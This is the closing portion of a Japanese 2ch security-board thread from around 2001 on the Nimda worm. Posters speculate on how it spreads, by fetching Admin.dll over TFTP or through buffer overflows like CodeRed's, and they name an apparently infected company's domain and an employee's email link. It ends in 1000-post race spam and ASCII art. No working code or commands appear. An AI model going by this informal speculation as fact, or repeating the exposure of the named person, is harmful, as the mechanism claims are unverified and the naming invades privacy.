NGNGここへきてぼろぼろ国内産ダイアルアップが釣れるよ。
国内ホームユーザドキュソは今一度自分は感染してないか要チェック
0948名無しさん@お腹いっぱい。
NGNG0949名無しさん@お腹いっぱい。
NGNGTFTPなんたらファイルでハードディスクが一杯になってもハングせず
動いてるってことだと思われ(w
0950名無しさん@お腹いっぱい。
NGNG会社というかソフト開発やってる会社ですがw
Presented by Zumen Soft Co,.Ltd
0951名無しさん@お腹いっぱい。
NGNG↓ ↓
某社(nimda感染) zumensoft.co.jp
じゃないのか?
0952名無しさん@お腹いっぱい。
NGNG初歩的な質問でスマンけど、「TFTPなんたらファイル」って実のところなんなんだっぺ?
ウイルススキャンでひっかかるのとひっかからないのがあるようだが。
まあ、ニムダ感染機ではたいてい増殖してるよね・・。
0953名無しさん@お腹いっぱい。
NGNGおそらく、起動不能マシンが出なければ、駆除もスキャンもしなかったと思われ。
0954名無しさん@お腹いっぱい
NGNG0955名無しさん@お腹いっぱい。
NGNGバックドア経由でAdmin.dll(Nimda本体)を送り込む。
↓
Admin.dllはすでにある(しかも動いてる)
↓
一時ファイル名のまま保存。
って感じかな。たぶん。
0956名無しさん@お腹いっぱい。
NGNGNT/2000 Serverだと、TFTPっていうツールがインストールされるんだけど、これは関係ないのかな?
0957名無しさん@お腹いっぱい。
NGNGファイルをputできるかなとか思ったんだが無理っぽい。
Pro版だと鯖は入ってないがルーター買うと付いてくるね。
0958名無しさん@お腹いっぱい。
NGNG結局にむだでもバックドアではなく、CodeRed同様未対策鯖のバッファオーバーフローを突いて自身を挿入しているということかな?(鯖攻撃で感染の場合)
0959名無しさん@お腹いっぱい。
NGNGそのTFTPっつーのをつかってgetさせてる。
putしてるんじゃなくて。
0960名無しさん@お腹いっぱい。
NGNGぴんぽん♪
http://cgibbs.mmjp.or.jp/bbs/show/www.zumensoft.co.jp/bbs
井上和仁
・・・のところをくりっくすると ρ(^-^)
mailto:inoue@zumensoft.co.jp
0961名無しさん@お腹いっぱい。
NGNGしかし、このzumensoft.co.jpにも「夢幻」にも教えてやりたいんだが、ホスト名もIPも晒されるような掲示板では、カキコする気も失せるな。
0962名無しさん@お腹いっぱい。
NGNG09631
NGNG0964名無しさん@お腹いっぱい。
NGNGよろしく〜
09651
NGNG「Nimda !! 」【その4】
http://ton.2ch.net/test/read.cgi/sec/1001864573/
09661
NGNGインストールの環境やインストールされてるアプリで変わるので
詳しくまとめた方カキコお願いします。
0967名無しさん@お腹いっぱい。
NGNGhttp://ton.2ch.net/test/read.cgi?bbs=sec&key=1001864573
こう書いて欲しかったYO!
ブラウザで読み込まれたので、ビックリ。
0968名無しさん@お腹いっぱい。
NGNG09691000!
NGNG0970 1000!!!!!
NGNG0971 1000!!!!!
NGNG0972名無しさん@お腹いっぱい。
NGNG0973サンボマスター
NGNG0974○タック25markU ◆Izgqidf6
NGNG2001年に言ってる。
ワロタ。
0975○タック25markU ◆Izgqidf6
NGNG0976○タック25markU ◆Izgqidf6
NGNGまた、この板ではアタック依頼は受け付けません
0977N.N.Y ◆N.N.YQ32
NGNG様々なネット上の危険からの防御法や対策を語りあうための板です。
掲示板の荒らし方や侵入の方法、メールボムの送り方等、
攻撃方法の質問はご遠慮下さい。
0978○タック25markU ◆2G.Atack
NGNG∧⊂ヽ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
(゚Д゚)ノ <すげーもう気づかれたよ。
(| | \__________
〜| |
∪∪
0979N.N.Y ◆N.N.YQ32
NGNG0980○タック25markU ◆2G.Atack
NGNG@@@@ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
(゜д゜@ < 連続投稿errorいや〜ん
┳⊂ ) \____________
[[[[|凵ノ⊃
◎U□◎ =3 キコキコキコ
0981N.N.Y ◆N.N.YQ32
NGNGネット犯罪の被害者になってしまった方は、まず警察にご相談下さい。
0982○タック25markU ◆2G.Atack
NGNG0983名無しさん@お腹いっぱい。
NGNG∩ ∩
| ○ | _______
∧_∧ /
(=´∇`=) < 君に胸きゅんっ★
∪ ∪ \
. 1000  ̄ ̄ ̄ ̄ ̄ ̄ ̄
0984ホル・マリン
NGNG0985N.N.Y ◆N.N.YQ32
NGNG0986○タック25markU ◆2G.Atack
NGNGCQは必ず来る。
99○で一度様子を見ないと一撃を食らう可能性が十分あることを。
ここはある程度数字稼いで。。
0987○タック25markU ◆2G.Atack
NGNG疲労のため10マイナス。
(かつて俺が立てたバトロワスレより。。)
0988○タック25markU ◆2G.Atack
NGNG0989○タック25markU ◆2G.Atack
NGNG|__)
| ∀・) 989.一度止めてみる
|⊂
|
0990○タック25markU ◆2G.Atack
NGNG580 名前:CQ ◆STUSSYFo :02/01/12 05:03 ID:yFIU89LD
( ‘д‘)<あいぼんやねんけど43コメげっとやで。
0991名無しさん@お腹いっぱい。
NGNG/(=´∇`=) /\
/| ̄ ∪∪ ̄ |\/
| |/
 ̄ ̄ ̄ ̄ ̄
0992名無しさん@お腹いっぱい。
NGNG/(=´∇`=) /\
/| ̄ ∪∪ ̄ ̄|\/
| 1000 |/
 ̄ ̄ ̄ ̄ ̄
0993○タック25markU ◆2G.Atack
NGNG彼はリロードしまくってる事を。
でも俺は違う。
0994こうこくぎょうしゃ
NGNG0995ホームラン級の馬鹿
NGNG0996○タック25markU ◆2G.Atack
NGNG0997名無しさん@お腹いっぱい。
NGNG0998名無しさん@お腹いっぱい。
NGNG| 1000! . |
|_________|
. ∧_ ∧ ||
(=´∇`=).||
C( づΦ
0999○タック25markU ◆2G.Atack
NGNG∧∧ ミ _ ドスッ
( ,,)┌─┴┴─┐
/ つ 1000げっちゅ│
〜′ /´ └─┬┬─┘
∪ ∪ ││ _ε3
1000○タック25markU ◆2G.Atack
NGNG☆1000☆
∧ ∧∧ ∧
(゚Д゚,,)(゚ー゚*) ... .。.*X..゚.
( つ┳⊂ ⊂)_。X *゚...X.* *.゚*。*゚...。゚* .
|三三三三|彡| *・。*..。゚. ゚ X ゚ ゚ ゚*。.。゚.. .X..
●,,,,,●⌒ヽ_ノ/ X .................................. ゚
(`д´*)( ") .......................................................................
〇,,‐〇,,ノ⌒"´.........::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::.......
........::::::::::::::::::::::::::::::::::::::::::::::::::::::: _ ロ _:::::::::::::::::::::::::::::::::::::::::::...........
......::::::::::::::::::::::::::::::::::::::::::::::::::: :::::::ロ\/|\/ロ::::::::::::::::::::::::::::::::::::::::::::::........
_ __ /\|/\ _ __
._|_」| |ロロロ| ,,, ,,,,. ロ――〇――ロ _|_」| |」」」|,,,、 ,,,
|`lロロロ|| |ロロロ|__,,";;;`,,";;;`,_\/\/__ |`lロロロ|| |」」」|_";;;;;`,
| :lロロロ|| |ロロロ||[
レス数が1000を超えています。これ以上書き込みはできません。